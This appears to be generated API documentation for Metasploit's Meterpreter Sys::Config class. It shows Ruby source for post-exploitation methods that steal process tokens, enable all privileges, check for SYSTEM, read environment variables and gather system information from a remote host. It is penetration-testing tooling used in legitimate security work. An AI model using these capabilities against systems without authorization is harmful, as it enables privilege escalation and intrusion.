Class: Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config
- Inherits: Object
- Defined in:
- lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
Overview
This class provides access to remote system configuration and information.
Constant Summary
- SYSTEM_SID =
'S-1-5-18'
Instance Method Summary
-
#drop_token ⇒ Object
Drops any assumed token.
-
#getenv(var_name) ⇒ Object
Returns the value of a single requested environment variable name.
-
#getenvs(*var_names) ⇒ Object
Returns a hash of requested environment variables, along with their values.
-
#getprivs ⇒ Object
Enables all possible privileges.
-
#getsid ⇒ Object
Gets the SID of the current process/thread.
-
#getuid ⇒ Object
Returns the username that the remote side is running as.
-
#initialize(client) ⇒ Config
constructor
A new instance of Config.
-
#is_system? ⇒ Boolean
Determine if the current process/thread is running as SYSTEM.
-
#revert_to_self ⇒ Object
Calls RevertToSelf on the remote machine.
-
#steal_token(pid) ⇒ Object
Steals the primary token from a target process.
-
#sysinfo ⇒ Object
Returns a hash of information about the remote computer.
Constructor Details
#initialize(client) ⇒ Config
Returns a new instance of Config.
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 25
#
# Creates a Config bound to a Meterpreter client session.
#
# @param client [Object] the session used by every other method here to
#   build and send stdapi_sys_config_* requests; stored via the `client=`
#   writer (its definition is outside this listing).
# @return [Config] a new instance of Config.
def initialize(client)
  self.client = client
end
Instance Method Details
#drop_token ⇒ Object
Drops any assumed token
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 122
#
# Drops any assumed token on the remote side.
#
# Sends a stdapi_sys_config_drop_token request and returns the username the
# remote side reports afterwards (TLV_TYPE_USER_NAME), run through
# client.unicode_filter_encode like the other username-returning methods.
#
# @return [Object] the filtered TLV_TYPE_USER_NAME value of the response.
def drop_token
  request = Packet.create_request('stdapi_sys_config_drop_token')
  response = client.send_request(request)
  user_name = response.get_tlv_value(TLV_TYPE_USER_NAME)
  client.unicode_filter_encode(user_name)
end
#getenv(var_name) ⇒ Object
Returns the value of a single requested environment variable name
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 80
#
# Returns the value of a single requested environment variable.
#
# Delegates to #getenvs and takes the value of the first entry in the
# returned hash; it does not look the entry up by name, so the caller gets
# whatever the remote side returned first for this request.
#
# @param var_name [String] name of the environment variable to query.
# @return [Object, nil] the first returned value, or nil when the hash is
#   empty (variable not found).
def getenv(var_name)
  getenvs(var_name).values.first
end
#getenvs(*var_names) ⇒ Object
Returns a hash of requested environment variables, along with their values. If a requested variable is absent from the returned hash, it was not found on the remote side.
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 58
#
# Returns a hash of requested environment variables mapped to their values.
#
# Each requested name is attached to a stdapi_sys_config_getenv request as
# a TLV_TYPE_ENV_VARIABLE; the response is walked per TLV_TYPE_ENV_GROUP and
# every group contributes one name => value pair. A name that is missing
# from the result was not found by the remote side.
#
# @param var_names [Array<String>] environment variable names to query.
# @return [Hash{Object => Object}] variable name => value, in response order.
def getenvs(*var_names)
  request = Packet.create_request('stdapi_sys_config_getenv')
  var_names.each { |name| request.add_tlv(TLV_TYPE_ENV_VARIABLE, name) }

  response = client.send_request(request)
  env_vars = {}
  response.each(TLV_TYPE_ENV_GROUP) do |group|
    env_vars[group.get_tlv_value(TLV_TYPE_ENV_VARIABLE)] = group.get_tlv_value(TLV_TYPE_ENV_VALUE)
  end
  env_vars
end
#getprivs ⇒ Object
Enables all possible privileges
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 131
#
# Enables all possible privileges on the remote side.
#
# Sends a stdapi_sys_config_getprivs request and collects the value of every
# TLV_TYPE_PRIVILEGE TLV in the response.
#
# @return [Array<Object>] the privilege values reported back, in response
#   order; empty when the response carries none.
def getprivs
  request = Packet.create_request('stdapi_sys_config_getprivs')
  response = client.send_request(request)

  privileges = []
  response.each(TLV_TYPE_PRIVILEGE) { |privilege| privileges << privilege.value }
  privileges
end
#getsid ⇒ Object
Gets the SID of the current process/thread.
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 41
#
# Gets the SID of the current process/thread on the remote side.
#
# @return [Object] the TLV_TYPE_SID value of the stdapi_sys_config_getsid
#   response, returned as-is (no unicode filtering is applied here).
def getsid
  response = client.send_request(Packet.create_request('stdapi_sys_config_getsid'))
  response.get_tlv_value(TLV_TYPE_SID)
end
#getuid ⇒ Object
Returns the username that the remote side is running as.
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 32
#
# Returns the username that the remote side is running as.
#
# @return [Object] the TLV_TYPE_USER_NAME value of the stdapi_sys_config_getuid
#   response, passed through client.unicode_filter_encode.
def getuid
  response = client.send_request(Packet.create_request('stdapi_sys_config_getuid'))
  user_name = response.get_tlv_value(TLV_TYPE_USER_NAME)
  client.unicode_filter_encode(user_name)
end
#is_system? ⇒ Boolean
Determine if the current process/thread is running as SYSTEM
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 50
#
# Determine if the current process/thread is running as SYSTEM.
#
# Compares the SID reported by #getsid with SYSTEM_SID ('S-1-5-18'). The
# answer is only as trustworthy as the remote side's reply: it is a plain
# string comparison, not an independent check.
#
# @return [Boolean] true when the reported SID equals SYSTEM_SID.
def is_system?
  SYSTEM_SID == getsid
end
#revert_to_self ⇒ Object
Calls RevertToSelf on the remote machine.
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 105
#
# Calls RevertToSelf on the remote machine.
#
# @return [Object] whatever client.send_request returns for the
#   stdapi_sys_config_rev2self request; the response is not inspected here.
def revert_to_self
  request = Packet.create_request('stdapi_sys_config_rev2self')
  client.send_request(request)
end
#steal_token(pid) ⇒ Object
Steals the primary token from a target process
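# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 112
#
# Steals the primary token from a target process.
#
# @param pid [Integer, String] process id of the target; an Integer or a
#   String of decimal digits.
# @return [Object] the TLV_TYPE_USER_NAME value of the
#   stdapi_sys_config_steal_token response, passed through
#   client.unicode_filter_encode.
# @raise [ArgumentError] if pid is not a decimal integer. Rejected here
#   rather than letting String#to_i quietly turn "12abc", "" or nil into
#   pid 0 and sending that to the remote side.
def steal_token(pid)
  # Integer(..., 10) is strict where #to_i is lenient; base 10 keeps a
  # leading-zero pid such as "010" meaning ten rather than octal.
  target_pid = Integer(pid.to_s, 10)

  req = Packet.create_request('stdapi_sys_config_steal_token')
  req.add_tlv(TLV_TYPE_PID, target_pid)
  res = client.send_request(req)
  client.unicode_filter_encode(res.get_tlv_value(TLV_TYPE_USER_NAME))
end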
#sysinfo ⇒ Object
Returns a hash of information about the remote computer.
# File 'lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb', line 88
#
# Returns a hash of information about the remote computer.
#
# Sends a stdapi_sys_config_sysinfo request and maps six TLV values of the
# response to fixed string keys. Unlike #getuid, the values are returned
# as-is, without client.unicode_filter_encode.
#
# @return [Hash{String => Object}] keys 'Computer', 'OS', 'Architecture',
#   'System Language', 'Domain' and 'Logged On Users', in that order; a
#   value is nil when the corresponding TLV is absent from the response.
def sysinfo
  response = client.send_request(Packet.create_request('stdapi_sys_config_sysinfo'))

  # Output key => TLV type it is read from; insertion order is the result order.
  fields = {
    'Computer'        => TLV_TYPE_COMPUTER_NAME,
    'OS'              => TLV_TYPE_OS_NAME,
    'Architecture'    => TLV_TYPE_ARCHITECTURE,
    'System Language' => TLV_TYPE_LANG_SYSTEM,
    'Domain'          => TLV_TYPE_DOMAIN,
    'Logged On Users' => TLV_TYPE_LOGGED_ON_USER_COUNT
  }
  fields.transform_values { |tlv_type| response.get_tlv_value(tlv_type) }
end